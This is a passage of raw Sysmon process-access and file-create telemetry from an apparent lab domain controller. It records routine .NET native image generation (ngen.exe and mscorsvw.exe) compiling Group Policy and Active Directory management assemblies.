13:25:17.445{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8003-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.445{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-8003-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:17.429{08A6967A-463D-6000-7F03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c0c-0\Microsoft.GroupPolicy.Management.dll2021-01-14 13:25:17.429 10341000x80000000000000007695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-7F03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.242{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463D-6000-7F03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.242{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-7F03-000000009A01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.195{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-7E03-000000009A01}4464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.179{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463D-6000-7E03-000000009A01}4464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.179{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-7E03-000000009A01}4464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:17.164{08A6967A-463D-6000-7D03-000000009A01}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dc-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-01-14 13:25:17.164 10341000x80000000000000007688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.086{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-7D03-000000009A01}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.070{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463D-6000-7D03-000000009A01}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.070{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-7D03-000000009A01}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.023{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-7C03-000000009A01}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.007{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463D-6000-7C03-000000009A01}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.007{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-7C03-000000009A01}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.992{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463E-6000-9103-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.992{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-9103-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:18.976{08A6967A-463E-6000-9003-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12d8-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-01-14 13:25:18.976 10341000x80000000000000007776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.898{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-9003-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.898{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463E-6000-9003-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.883{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-9003-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.820{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8F03-000000009A01}3044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.804{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8F03-000000009A01}3044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.804{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8F03-000000009A01}3044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:18.773{08A6967A-463E-6000-8E03-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d28-0\Microsoft.ActiveDirectory.TRLParser.dll2021-01-14 13:25:18.773 10341000x80000000000000007769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 